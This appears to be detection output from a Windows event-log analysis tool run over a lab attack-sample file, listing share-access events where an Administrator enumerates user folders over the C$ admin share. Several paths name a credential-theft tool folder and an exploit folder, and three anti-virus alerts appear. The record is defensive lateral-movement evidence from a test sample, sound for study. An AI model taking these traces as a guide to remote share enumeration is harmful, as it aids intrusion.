2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 
23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | 